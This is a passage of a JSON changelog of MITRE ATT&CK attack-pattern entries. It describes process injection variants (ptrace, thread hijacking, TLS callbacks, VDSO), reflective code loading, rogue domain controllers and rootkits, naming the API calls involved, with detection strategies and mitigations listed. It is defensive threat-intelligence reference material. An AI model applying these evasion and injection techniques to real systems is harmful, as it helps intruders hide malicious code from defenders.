                    "description": "Adversaries may inject malicious code into processes via ptrace (process trace) system calls in order to evade process-based defenses as well as possibly elevate privileges. Ptrace system call injection is a method of executing arbitrary code in the address space of a separate live process. \n\nPtrace system call injection involves attaching to and modifying a running process. The ptrace system call enables a debugging process to observe and control another process (and each individual thread), including changing memory and register values.(Citation: PTRACE man) Ptrace system call injection is commonly performed by writing arbitrary code into a running process (ex: <code>malloc</code>) then invoking that memory with <code>PTRACE_SETREGS</code> to set the register containing the next instruction to execute. Ptrace system call injection can also be done with <code>PTRACE_POKETEXT</code>/<code>PTRACE_POKEDATA</code>, which copy data to a specific address in the target processes\u2019 memory (ex: the current address of the next instruction). (Citation: PTRACE man)(Citation: Medium Ptrace JUL 2018) \n\nPtrace system call injection may not be possible targeting processes that are non-child processes and/or have higher-privileges.(Citation: BH Linux Inject) \n\nRunning code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via ptrace system call injection may also evade detection from security products since the execution is masked under a legitimate process. ",
                    "kill_chain_phases": [
                        {
                            "kill_chain_name": "mitre-attack",
                            "phase_name": "stealth"
                        },
                        {
                            "kill_chain_name": "mitre-attack",
                            "phase_name": "privilege-escalation"
                        }
                    ],
                    "revoked": false,
                    "external_references": [
                        {
                            "source_name": "mitre-attack",
                            "url": "https://attack.mitre.org/techniques/T1055/008",
                            "external_id": "T1055.008"
                        },
                        {
                            "source_name": "BH Linux Inject",
                            "description": "Colgan, T. (2015, August 15). Linux-Inject. Retrieved February 21, 2020.",
                            "url": "https://github.com/gaffe23/linux-inject/blob/master/slides_BHArsenal2015.pdf"
                        },
                        {
                            "source_name": "Medium Ptrace JUL 2018",
                            "description": "Jain, S. (2018, July 25). Code injection in running process using ptrace. Retrieved February 21, 2020.",
                            "url": "https://medium.com/@jain.sm/code-injection-in-running-process-using-ptrace-d3ea7191a4be"
                        },
                        {
                            "source_name": "PTRACE man",
                            "description": "Kerrisk, M. (2020, February 9). PTRACE(2) - Linux Programmer's Manual. Retrieved February 21, 2020.",
                            "url": "http://man7.org/linux/man-pages/man2/ptrace.2.html"
                        }
                    ],
                    "object_marking_refs": [
                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                    ],
                    "x_mitre_attack_spec_version": "3.3.0",
                    "x_mitre_deprecated": false,
                    "x_mitre_domains": [
                        "enterprise-attack"
                    ],
                    "x_mitre_is_subtechnique": true,
                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "x_mitre_platforms": [
                        "Linux"
                    ],
                    "x_mitre_version": "2.0",
                    "detailed_diff": "{\"dictionary_item_removed\": {\"root['x_mitre_detection']\": \"\"}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-04-15 22:30:27.359000+00:00\", \"old_value\": \"2025-10-24 17:49:33.344000+00:00\"}, \"root['kill_chain_phases'][0]['phase_name']\": {\"new_value\": \"stealth\", \"old_value\": \"defense-evasion\"}, \"root['x_mitre_attack_spec_version']\": {\"new_value\": \"3.3.0\", \"old_value\": \"3.2.0\"}, \"root['x_mitre_version']\": {\"new_value\": \"2.0\", \"old_value\": \"1.2\"}}, \"iterable_item_removed\": {\"root['external_references'][4]\": {\"source_name\": \"ArtOfMemoryForensics\", \"description\": \"Ligh, M.H. et al.. (2014, July). The Art of Memory Forensics: Detecting Malware and Threats in Windows, Linux, and Mac Memory. Retrieved December 20, 2017.\"}, \"root['external_references'][5]\": {\"source_name\": \"GNU Acct\", \"description\": \"GNU. (2010, February 5). The GNU Accounting Utilities. Retrieved December 20, 2017.\", \"url\": \"https://www.gnu.org/software/acct/\"}, \"root['external_references'][6]\": {\"source_name\": \"RHEL auditd\", \"description\": \"Jahoda, M. et al.. (2017, March 14). redhat Security Guide - Chapter 7 - System Auditing. Retrieved December 20, 2017.\", \"url\": \"https://access.redhat.com/documentation/en-us/red_hat_enterprise_linux/6/html/security_guide/chap-system_auditing\"}, \"root['external_references'][7]\": {\"source_name\": \"Chokepoint preload rootkits\", \"description\": \"stderr. (2014, February 14). Detecting Userland Preload Rootkits. Retrieved December 20, 2017.\", \"url\": \"http://www.chokepoint.net/2014/02/detecting-userland-preload-rootkits.html\"}}}",
                    "previous_version": "1.2",
                    "version_change": "1.2 \u2192 2.0",
                    "changelog_mitigations": {
                        "shared": [
                            "M1026: Privileged Account Management",
                            "M1040: Behavior Prevention on Endpoint"
                        ],
                        "new": [],
                        "dropped": []
                    },
                    "changelog_datacomponent_detections": {
                        "shared": [],
                        "new": [],
                        "dropped": []
                    },
                    "changelog_detectionstrategy_detections": {
                        "shared": [
                            "DET0203: Detection Strategy for Ptrace-Based Process Injection on Linux"
                        ],
                        "new": [],
                        "dropped": []
                    }
                },
                {
                    "type": "attack-pattern",
                    "id": "attack-pattern--41d9846c-f6af-4302-a654-24bba2729bc6",
                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "created": "2020-01-14 01:28:32.166000+00:00",
                    "modified": "2026-04-15 22:30:40.463000+00:00",
                    "name": "Thread Execution Hijacking",
                    "description": "Adversaries may inject malicious code into hijacked processes in order to evade process-based defenses as well as possibly elevate privileges. Thread Execution Hijacking is a method of executing arbitrary code in the address space of a separate live process. \n\nThread Execution Hijacking is commonly performed by suspending an existing process then unmapping/hollowing its memory, which can then be replaced with malicious code or the path to a DLL. A handle to an existing victim process is first created with native Windows API calls such as <code>OpenThread</code>. At this point the process can be suspended then written to, realigned to the injected code, and resumed via <code>SuspendThread </code>, <code>VirtualAllocEx</code>, <code>WriteProcessMemory</code>, <code>SetThreadContext</code>, then <code>ResumeThread</code> respectively.(Citation: Elastic Process Injection July 2017)\n\nThis is very similar to [Process Hollowing](https://attack.mitre.org/techniques/T1055/012) but targets an existing process rather than creating a process in a suspended state.  \n\nRunning code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via Thread Execution Hijacking may also evade detection from security products since the execution is masked under a legitimate process. ",
                    "kill_chain_phases": [
                        {
                            "kill_chain_name": "mitre-attack",
                            "phase_name": "stealth"
                        },
                        {
                            "kill_chain_name": "mitre-attack",
                            "phase_name": "privilege-escalation"
                        }
                    ],
                    "revoked": false,
                    "external_references": [
                        {
                            "source_name": "mitre-attack",
                            "url": "https://attack.mitre.org/techniques/T1055/003",
                            "external_id": "T1055.003"
                        },
                        {
                            "source_name": "Elastic Process Injection July 2017",
                            "description": "Hosseini, A. (2017, July 18). Ten Process Injection Techniques: A Technical Survey Of Common And Trending Process Injection Techniques. Retrieved December 7, 2017.",
                            "url": "https://www.endgame.com/blog/technical-blog/ten-process-injection-techniques-technical-survey-common-and-trending-process"
                        }
                    ],
                    "object_marking_refs": [
                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                    ],
                    "x_mitre_attack_spec_version": "3.3.0",
                    "x_mitre_deprecated": false,
                    "x_mitre_domains": [
                        "enterprise-attack"
                    ],
                    "x_mitre_is_subtechnique": true,
                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "x_mitre_platforms": [
                        "Windows"
                    ],
                    "x_mitre_version": "2.0",
                    "detailed_diff": "{\"dictionary_item_removed\": {\"root['x_mitre_detection']\": \"\"}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-04-15 22:30:40.463000+00:00\", \"old_value\": \"2025-10-24 17:48:42.433000+00:00\"}, \"root['kill_chain_phases'][0]['phase_name']\": {\"new_value\": \"stealth\", \"old_value\": \"defense-evasion\"}, \"root['x_mitre_attack_spec_version']\": {\"new_value\": \"3.3.0\", \"old_value\": \"3.2.0\"}, \"root['x_mitre_version']\": {\"new_value\": \"2.0\", \"old_value\": \"1.2\"}}}",
                    "previous_version": "1.2",
                    "version_change": "1.2 \u2192 2.0",
                    "changelog_mitigations": {
                        "shared": [
                            "M1040: Behavior Prevention on Endpoint"
                        ],
                        "new": [],
                        "dropped": []
                    },
                    "changelog_datacomponent_detections": {
                        "shared": [],
                        "new": [],
                        "dropped": []
                    },
                    "changelog_detectionstrategy_detections": {
                        "shared": [
                            "DET0295: Behavioral Detection of Thread Execution Hijacking via Thread Suspension and Context Switching"
                        ],
                        "new": [],
                        "dropped": []
                    }
                },
                {
                    "type": "attack-pattern",
                    "id": "attack-pattern--e49ee9d2-0d98-44ef-85e5-5d3100065744",
                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "created": "2020-01-14 01:30:41.092000+00:00",
                    "modified": "2026-04-15 22:30:51.339000+00:00",
                    "name": "Thread Local Storage",
                    "description": "Adversaries may inject malicious code into processes via thread local storage (TLS) callbacks in order to evade process-based defenses as well as possibly elevate privileges. TLS callback injection is a method of executing arbitrary code in the address space of a separate live process. \n\nTLS callback injection involves manipulating pointers inside a portable executable (PE) to redirect a process to malicious code before reaching the code's legitimate entry point. TLS callbacks are normally used by the OS to setup and/or cleanup data used by threads. Manipulating TLS callbacks may be performed by allocating and writing to specific offsets within a process\u2019 memory space using other [Process Injection](https://attack.mitre.org/techniques/T1055) techniques such as [Process Hollowing](https://attack.mitre.org/techniques/T1055/012).(Citation: FireEye TLS Nov 2017)\n\nRunning code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via TLS callback injection may also evade detection from security products since the execution is masked under a legitimate process. ",
                    "kill_chain_phases": [
                        {
                            "kill_chain_name": "mitre-attack",
                            "phase_name": "stealth"
                        },
                        {
                            "kill_chain_name": "mitre-attack",
                            "phase_name": "privilege-escalation"
                        }
                    ],
                    "revoked": false,
                    "external_references": [
                        {
                            "source_name": "mitre-attack",
                            "url": "https://attack.mitre.org/techniques/T1055/005",
                            "external_id": "T1055.005"
                        },
                        {
                            "source_name": "FireEye TLS Nov 2017",
                            "description": "Vaish, A. & Nemes, S. (2017, November 28). Newly Observed Ursnif Variant Employs Malicious TLS Callback Technique to Achieve Process Injection. Retrieved December 18, 2017.",
                            "url": "https://www.fireeye.com/blog/threat-research/2017/11/ursnif-variant-malicious-tls-callback-technique.html"
                        }
                    ],
                    "object_marking_refs": [
                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                    ],
                    "x_mitre_attack_spec_version": "3.3.0",
                    "x_mitre_deprecated": false,
                    "x_mitre_domains": [
                        "enterprise-attack"
                    ],
                    "x_mitre_is_subtechnique": true,
                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "x_mitre_platforms": [
                        "Windows"
                    ],
                    "x_mitre_version": "2.0",
                    "detailed_diff": "{\"dictionary_item_removed\": {\"root['x_mitre_detection']\": \"\"}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-04-15 22:30:51.339000+00:00\", \"old_value\": \"2025-10-24 17:49:32.111000+00:00\"}, \"root['kill_chain_phases'][0]['phase_name']\": {\"new_value\": \"stealth\", \"old_value\": \"defense-evasion\"}, \"root['x_mitre_attack_spec_version']\": {\"new_value\": \"3.3.0\", \"old_value\": \"3.2.0\"}, \"root['x_mitre_version']\": {\"new_value\": \"2.0\", \"old_value\": \"1.2\"}}, \"iterable_item_removed\": {\"root['external_references'][1]\": {\"source_name\": \"Elastic Process Injection July 2017\", \"description\": \"Hosseini, A. (2017, July 18). Ten Process Injection Techniques: A Technical Survey Of Common And Trending Process Injection Techniques. Retrieved December 7, 2017.\", \"url\": \"https://www.endgame.com/blog/technical-blog/ten-process-injection-techniques-technical-survey-common-and-trending-process\"}}}",
                    "previous_version": "1.2",
                    "version_change": "1.2 \u2192 2.0",
                    "changelog_mitigations": {
                        "shared": [
                            "M1040: Behavior Prevention on Endpoint"
                        ],
                        "new": [],
                        "dropped": []
                    },
                    "changelog_datacomponent_detections": {
                        "shared": [],
                        "new": [],
                        "dropped": []
                    },
                    "changelog_detectionstrategy_detections": {
                        "shared": [
                            "DET0467: Detection Strategy for TLS Callback Injection via PE Memory Modification and Hollowing"
                        ],
                        "new": [],
                        "dropped": []
                    }
                },
                {
                    "type": "attack-pattern",
                    "id": "attack-pattern--98be40f2-c86b-4ade-b6fc-4964932040e5",
                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "created": "2020-01-14 01:35:00.781000+00:00",
                    "modified": "2026-04-15 22:30:51.756000+00:00",
                    "name": "VDSO Hijacking",
                    "description": "Adversaries may inject malicious code into processes via VDSO hijacking in order to evade process-based defenses as well as possibly elevate privileges. Virtual dynamic shared object (vdso) hijacking is a method of executing arbitrary code in the address space of a separate live process. \n\nVDSO hijacking involves redirecting calls to dynamically linked shared libraries. Memory protections may prevent writing executable code to a process via [Ptrace System Calls](https://attack.mitre.org/techniques/T1055/008). However, an adversary may hijack the syscall interface code stubs mapped into a process from the vdso shared object to execute syscalls to open and map a malicious shared object. This code can then be invoked by redirecting the execution flow of the process via patched memory address references stored in a process' global offset table (which store absolute addresses of mapped library functions).(Citation: ELF Injection May 2009)(Citation: Backtrace VDSO)(Citation: VDSO Aug 2005)(Citation: Syscall 2014)\n\nRunning code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via VDSO hijacking may also evade detection from security products since the execution is masked under a legitimate process.  ",
                    "kill_chain_phases": [
                        {
                            "kill_chain_name": "mitre-attack",
                            "phase_name": "stealth"
                        },
                        {
                            "kill_chain_name": "mitre-attack",
                            "phase_name": "privilege-escalation"
                        }
                    ],
                    "revoked": false,
                    "external_references": [
                        {
                            "source_name": "mitre-attack",
                            "url": "https://attack.mitre.org/techniques/T1055/014",
                            "external_id": "T1055.014"
                        },
                        {
                            "source_name": "Backtrace VDSO",
                            "description": "backtrace. (2016, April 22). ELF SHARED LIBRARY INJECTION FORENSICS. Retrieved November 17, 2024.",
                            "url": "https://web.archive.org/web/20210205211142/https://backtrace.io/blog/backtrace/elf-shared-library-injection-forensics/"
                        },
                        {
                            "source_name": "Syscall 2014",
                            "description": "Drysdale, D. (2014, July 16). Anatomy of a system call, part 2. Retrieved June 16, 2020.",
                            "url": "https://lwn.net/Articles/604515/"
                        },
                        {
                            "source_name": "ELF Injection May 2009",
                            "description": "O'Neill, R. (2009, May). Modern Day ELF Runtime infection via GOT poisoning. Retrieved March 15, 2020.",
                            "url": "https://web.archive.org/web/20150711051625/http://vxer.org/lib/vrn00.html"
                        },
                        {
                            "source_name": "VDSO Aug 2005",
                            "description": "Petersson, J. (2005, August 14). What is linux-gate.so.1?. Retrieved June 16, 2020.",
                            "url": "https://web.archive.org/web/20051013084246/http://www.trilithium.com/johan/2005/08/linux-gate/"
                        }
                    ],
                    "object_marking_refs": [
                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                    ],
                    "x_mitre_attack_spec_version": "3.3.0",
                    "x_mitre_deprecated": false,
                    "x_mitre_domains": [
                        "enterprise-attack"
                    ],
                    "x_mitre_is_subtechnique": true,
                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "x_mitre_platforms": [
                        "Linux"
                    ],
                    "x_mitre_version": "2.0",
                    "detailed_diff": "{\"dictionary_item_removed\": {\"root['x_mitre_detection']\": \"\"}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-04-15 22:30:51.756000+00:00\", \"old_value\": \"2025-10-24 17:49:08.040000+00:00\"}, \"root['kill_chain_phases'][0]['phase_name']\": {\"new_value\": \"stealth\", \"old_value\": \"defense-evasion\"}, \"root['x_mitre_attack_spec_version']\": {\"new_value\": \"3.3.0\", \"old_value\": \"3.2.0\"}, \"root['x_mitre_version']\": {\"new_value\": \"2.0\", \"old_value\": \"1.2\"}}, \"iterable_item_removed\": {\"root['external_references'][3]\": {\"source_name\": \"GNU Acct\", \"description\": \"GNU. (2010, February 5). The GNU Accounting Utilities. Retrieved December 20, 2017.\", \"url\": \"https://www.gnu.org/software/acct/\"}, \"root['external_references'][4]\": {\"source_name\": \"RHEL auditd\", \"description\": \"Jahoda, M. et al.. (2017, March 14). redhat Security Guide - Chapter 7 - System Auditing. Retrieved December 20, 2017.\", \"url\": \"https://access.redhat.com/documentation/en-us/red_hat_enterprise_linux/6/html/security_guide/chap-system_auditing\"}, \"root['external_references'][5]\": {\"source_name\": \"ArtOfMemoryForensics\", \"description\": \"Ligh, M.H. et al.. (2014, July). The Art of Memory Forensics: Detecting Malware and Threats in Windows, Linux, and Mac Memory. Retrieved December 20, 2017.\"}, \"root['external_references'][8]\": {\"source_name\": \"Chokepoint preload rootkits\", \"description\": \"stderr. (2014, February 14). Detecting Userland Preload Rootkits. Retrieved December 20, 2017.\", \"url\": \"http://www.chokepoint.net/2014/02/detecting-userland-preload-rootkits.html\"}}}",
                    "previous_version": "1.2",
                    "version_change": "1.2 \u2192 2.0",
                    "changelog_mitigations": {
                        "shared": [
                            "M1040: Behavior Prevention on Endpoint"
                        ],
                        "new": [],
                        "dropped": []
                    },
                    "changelog_datacomponent_detections": {
                        "shared": [],
                        "new": [],
                        "dropped": []
                    },
                    "changelog_detectionstrategy_detections": {
                        "shared": [
                            "DET0448: Detection Strategy for VDSO Hijacking on Linux"
                        ],
                        "new": [],
                        "dropped": []
                    }
                },
                {
                    "type": "attack-pattern",
                    "id": "attack-pattern--4933e63b-9b77-476e-ab29-761bc5b7d15a",
                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "created": "2021-10-05 01:15:06.293000+00:00",
                    "modified": "2026-04-15 22:32:18.632000+00:00",
                    "name": "Reflective Code Loading",
                    "description": "Adversaries may reflectively load code into a process in order to conceal the execution of malicious payloads. Reflective loading involves allocating then executing payloads directly within the memory of the process, vice creating a thread or process backed by a file path on disk (e.g., [Shared Modules](https://attack.mitre.org/techniques/T1129)).\n\nReflectively loaded payloads may be compiled binaries, anonymous files (only present in RAM), or just snubs of fileless executable code (ex: position-independent shellcode).(Citation: Introducing Donut)(Citation: S1 Custom Shellcode Tool)(Citation: Stuart ELF Memory)(Citation: 00sec Droppers)(Citation: Mandiant BYOL) For example, the `Assembly.Load()` method executed by [PowerShell](https://attack.mitre.org/techniques/T1059/001) may be abused to load raw code into the running process.(Citation: Microsoft AssemblyLoad)\n\nReflective code injection is very similar to [Process Injection](https://attack.mitre.org/techniques/T1055) except that the \u201cinjection\u201d loads code into the processes\u2019 own memory instead of that of a separate process. Reflective loading may evade process-based detections since the execution of the arbitrary code may be masked within a legitimate or otherwise benign process. Reflectively loading payloads directly into memory may also avoid creating files or other artifacts on disk, while also enabling malware to keep these payloads encrypted (or otherwise obfuscated) until execution.(Citation: Stuart ELF Memory)(Citation: 00sec Droppers)(Citation: Intezer ACBackdoor)(Citation: S1 Old Rat New Tricks)",
                    "kill_chain_phases": [
                        {
                            "kill_chain_name": "mitre-attack",
                            "phase_name": "stealth"
                        }
                    ],
                    "revoked": false,
                    "external_references": [
                        {
                            "source_name": "mitre-attack",
                            "url": "https://attack.mitre.org/techniques/T1620",
                            "external_id": "T1620"
                        },
                        {
                            "source_name": "00sec Droppers",
                            "description": "0x00pico. (2017, September 25). Super-Stealthy Droppers. Retrieved October 4, 2021.",
                            "url": "https://0x00sec.org/t/super-stealthy-droppers/3715"
                        },
                        {
                            "source_name": "S1 Custom Shellcode Tool",
                            "description": "Bunce, D. (2019, October 31). Building A Custom Tool For Shellcode Analysis. Retrieved October 4, 2021.",
                            "url": "https://www.sentinelone.com/blog/building-a-custom-tool-for-shellcode-analysis/"
                        },
                        {
                            "source_name": "Mandiant BYOL",
                            "description": "Kirk, N. (2018, June 18). Bring Your Own Land (BYOL) \u2013 A Novel Red Teaming Technique. Retrieved October 4, 2021.",
                            "url": "https://www.mandiant.com/resources/bring-your-own-land-novel-red-teaming-technique"
                        },
                        {
                            "source_name": "S1 Old Rat New Tricks",
                            "description": "Landry, J. (2016, April 21). Teaching an old RAT new tricks. Retrieved October 4, 2021.",
                            "url": "https://www.sentinelone.com/blog/teaching-an-old-rat-new-tricks/"
                        },
                        {
                            "source_name": "Microsoft AssemblyLoad",
                            "description": "Microsoft. (n.d.). Assembly.Load Method. Retrieved February 9, 2024.",
                            "url": "https://learn.microsoft.com/dotnet/api/system.reflection.assembly.load"
                        },
                        {
                            "source_name": "Intezer ACBackdoor",
                            "description": "Sanmillan, I. (2019, November 18). ACBackdoor: Analysis of a New Multiplatform Backdoor. Retrieved October 4, 2021.",
                            "url": "https://intezer.com/acbackdoor-analysis-of-a-new-multiplatform-backdoor/"
                        },
                        {
                            "source_name": "Stuart ELF Memory",
                            "description": "Stuart. (2018, March 31). In-Memory-Only ELF Execution (Without tmpfs). Retrieved October 4, 2021.",
                            "url": "https://magisterquis.github.io/2018/03/31/in-memory-only-elf-execution.html"
                        },
                        {
                            "source_name": "Introducing Donut",
                            "description": "The Wover. (2019, May 9). Donut - Injecting .NET Assemblies as Shellcode. Retrieved October 4, 2021.",
                            "url": "https://thewover.github.io/Introducing-Donut/"
                        }
                    ],
                    "object_marking_refs": [
                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                    ],
                    "x_mitre_attack_spec_version": "3.3.0",
                    "x_mitre_contributors": [
                        "Jo\u00e3o Paulo de A. Filho, @Hug1nN__",
                        "Shlomi Salem, SentinelOne",
                        "Lior Ribak, SentinelOne",
                        "Rex Guo, @Xiaofei_REX, Confluera",
                        "Joas Antonio dos Santos, @C0d3Cr4zy, Inmetrics",
                        "Jiraput Thamsongkrah"
                    ],
                    "x_mitre_deprecated": false,
                    "x_mitre_domains": [
                        "enterprise-attack"
                    ],
                    "x_mitre_is_subtechnique": false,
                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "x_mitre_platforms": [
                        "Linux",
                        "macOS",
                        "Windows"
                    ],
                    "x_mitre_version": "2.0",
                    "detailed_diff": "{\"dictionary_item_removed\": {\"root['x_mitre_detection']\": \"\"}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-04-15 22:32:18.632000+00:00\", \"old_value\": \"2025-10-24 17:48:44.030000+00:00\"}, \"root['kill_chain_phases'][0]['phase_name']\": {\"new_value\": \"stealth\", \"old_value\": \"defense-evasion\"}, \"root['external_references'][7]['url']\": {\"new_value\": \"https://intezer.com/acbackdoor-analysis-of-a-new-multiplatform-backdoor/\", \"old_value\": \"https://www.intezer.com/blog/research/acbackdoor-analysis-of-a-new-multiplatform-backdoor/\", \"new_path\": \"root['external_references'][6]['url']\"}, \"root['x_mitre_attack_spec_version']\": {\"new_value\": \"3.3.0\", \"old_value\": \"3.2.0\"}, \"root['x_mitre_version']\": {\"new_value\": \"2.0\", \"old_value\": \"1.3\"}}, \"iterable_item_removed\": {\"root['external_references'][5]\": {\"source_name\": \"MDSec Detecting DOTNET\", \"description\": \"MDSec Research. (n.d.). Detecting and Advancing In-Memory .NET Tradecraft. Retrieved October 4, 2021.\", \"url\": \"https://www.mdsec.co.uk/2020/06/detecting-and-advancing-in-memory-net-tradecraft/\"}}}",
                    "previous_version": "1.3",
                    "version_change": "1.3 \u2192 2.0",
                    "changelog_mitigations": {
                        "shared": [],
                        "new": [],
                        "dropped": []
                    },
                    "changelog_datacomponent_detections": {
                        "shared": [],
                        "new": [],
                        "dropped": []
                    },
                    "changelog_detectionstrategy_detections": {
                        "shared": [
                            "DET0300: Detection Strategy for Reflective Code Loading"
                        ],
                        "new": [],
                        "dropped": []
                    }
                },
                {
                    "type": "attack-pattern",
                    "id": "attack-pattern--564998d8-ab3e-4123-93fb-eccaa6b9714a",
                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "created": "2018-04-18 17:59:24.739000+00:00",
                    "modified": "2026-04-16 20:07:52.911000+00:00",
                    "name": "Rogue Domain Controller",
                    "description": "Adversaries may register a rogue Domain Controller to enable manipulation of Active Directory data. DCShadow may be used to create a rogue Domain Controller (DC). DCShadow is a method of manipulating Active Directory (AD) data, including objects and schemas, by registering (or reusing an inactive registration) and simulating the behavior of a DC. (Citation: DCShadow Blog) Once registered, a rogue DC may be able to inject and replicate changes into AD infrastructure for any domain object, including credentials and keys.\n\nRegistering a rogue DC involves creating a new server and nTDSDSA objects in the Configuration partition of the AD schema, which requires Administrator privileges (either Domain or local to the DC) or the KRBTGT hash. (Citation: Adsecurity Mimikatz Guide)\n\nThis technique may bypass system logging and security monitors such as security information and event management (SIEM) products (since actions taken on a rogue DC may not be reported to these sensors). (Citation: DCShadow Blog) The technique may also be used to alter and delete replication and other associated metadata to obstruct forensic analysis. Adversaries may also utilize this technique to perform [SID-History Injection](https://attack.mitre.org/techniques/T1134/005) and/or manipulate AD objects (such as accounts, access control lists, schemas) to establish backdoors for Persistence. (Citation: DCShadow Blog)",
                    "kill_chain_phases": [
                        {
                            "kill_chain_name": "mitre-attack",
                            "phase_name": "defense-impairment"
                        }
                    ],
                    "revoked": false,
                    "external_references": [
                        {
                            "source_name": "mitre-attack",
                            "url": "https://attack.mitre.org/techniques/T1207",
                            "external_id": "T1207"
                        },
                        {
                            "source_name": "DCShadow Blog",
                            "description": "Delpy, B. & LE TOUX, V. (n.d.). DCShadow. Retrieved March 20, 2018.",
                            "url": "https://www.dcshadow.com/"
                        },
                        {
                            "source_name": "Adsecurity Mimikatz Guide",
                            "description": "Metcalf, S. (2015, November 13). Unofficial Guide to Mimikatz & Command Reference. Retrieved December 23, 2015.",
                            "url": "https://adsecurity.org/?page_id=1821"
                        }
                    ],
                    "object_marking_refs": [
                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                    ],
                    "x_mitre_attack_spec_version": "3.3.0",
                    "x_mitre_contributors": [
                        "Vincent Le Toux"
                    ],
                    "x_mitre_deprecated": false,
                    "x_mitre_domains": [
                        "enterprise-attack"
                    ],
                    "x_mitre_is_subtechnique": false,
                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "x_mitre_platforms": [
                        "Windows"
                    ],
                    "x_mitre_version": "3.0",
                    "detailed_diff": "{\"dictionary_item_removed\": {\"root['x_mitre_detection']\": \"\"}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-04-16 20:07:52.911000+00:00\", \"old_value\": \"2025-10-24 17:48:48.823000+00:00\"}, \"root['kill_chain_phases'][0]['phase_name']\": {\"new_value\": \"defense-impairment\", \"old_value\": \"defense-evasion\"}, \"root['x_mitre_attack_spec_version']\": {\"new_value\": \"3.3.0\", \"old_value\": \"3.2.0\"}, \"root['x_mitre_version']\": {\"new_value\": \"3.0\", \"old_value\": \"2.2\"}}, \"iterable_item_removed\": {\"root['external_references'][3]\": {\"source_name\": \"GitHub DCSYNCMonitor\", \"description\": \"Spencer S. (2018, February 22). DCSYNCMonitor. Retrieved March 30, 2018.\", \"url\": \"https://github.com/shellster/DCSYNCMonitor\"}, \"root['external_references'][4]\": {\"source_name\": \"Microsoft DirSync\", \"description\": \"Microsoft. (n.d.). Polling for Changes Using the DirSync Control. Retrieved March 30, 2018.\", \"url\": \"https://msdn.microsoft.com/en-us/library/ms677626.aspx\"}, \"root['external_references'][5]\": {\"source_name\": \"ADDSecurity DCShadow Feb 2018\", \"description\": \"Lucand,G. (2018, February 18). Detect DCShadow, impossible?. Retrieved March 30, 2018.\", \"url\": \"https://adds-security.blogspot.fr/2018/02/detecter-dcshadow-impossible.html\"}}}",
                    "previous_version": "2.2",
                    "version_change": "2.2 \u2192 3.0",
                    "changelog_mitigations": {
                        "shared": [],
                        "new": [],
                        "dropped": []
                    },
                    "changelog_datacomponent_detections": {
                        "shared": [],
                        "new": [],
                        "dropped": []
                    },
                    "changelog_detectionstrategy_detections": {
                        "shared": [
                            "DET0276: Detection Strategy for Rogue Domain Controller (DCShadow) Registration and Replication Abuse"
                        ],
                        "new": [],
                        "dropped": []
                    }
                },
                {
                    "type": "attack-pattern",
                    "id": "attack-pattern--0f20e3cb-245b-4a61-8a91-2d93f7cb0e9b",
                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "created": "2017-05-31 21:30:26.496000+00:00",
                    "modified": "2026-04-15 22:32:28.874000+00:00",
                    "name": "Rootkit",
                    "description": "Adversaries may use rootkits to hide the presence of programs, files, network connections, services, drivers, and other system components. Rootkits are programs that hide the existence of malware by intercepting/hooking and modifying operating system API calls that supply system information. (Citation: Symantec Windows Rootkits) \n\nRootkits or rootkit enabling functionality may reside at the user or kernel level in the operating system or lower, to include a hypervisor or [System Firmware](https://attack.mitre.org/techniques/T1542/001). (Citation: Wikipedia Rootkit) Rootkits have been seen for Windows, Linux, and Mac OS X systems. (Citation: CrowdStrike Linux Rootkit) (Citation: BlackHat Mac OSX Rootkit)\n\nRootkits that reside or modify boot sectors are known as [Bootkit](https://attack.mitre.org/techniques/T1542/003)s and specifically target the boot process of the operating system.",
                    "kill_chain_phases": [
                        {
                            "kill_chain_name": "mitre-attack",
                            "phase_name": "stealth"
                        }
                    ],
                    "revoked": false,
                    "external_references": [
                        {
                            "source_name": "mitre-attack",
                            "url": "https://attack.mitre.org/techniques/T1014",
                            "external_id": "T1014"
                        },
                        {
                            "source_name": "CrowdStrike Linux Rootkit",
                            "description": "Kurtz, G. (2012, November 19). HTTP iframe Injecting Linux Rootkit. Retrieved December 21, 2017.",
                            "url": "https://www.crowdstrike.com/blog/http-iframe-injecting-linux-rootkit/"
                        },
                        {
                            "source_name": "BlackHat Mac OSX Rootkit",
                            "description": "Pan, M., Tsai, S. (2014). You can\u2019t see me: A Mac OS X Rootkit uses the tricks you haven't known yet. Retrieved December 21, 2017.",
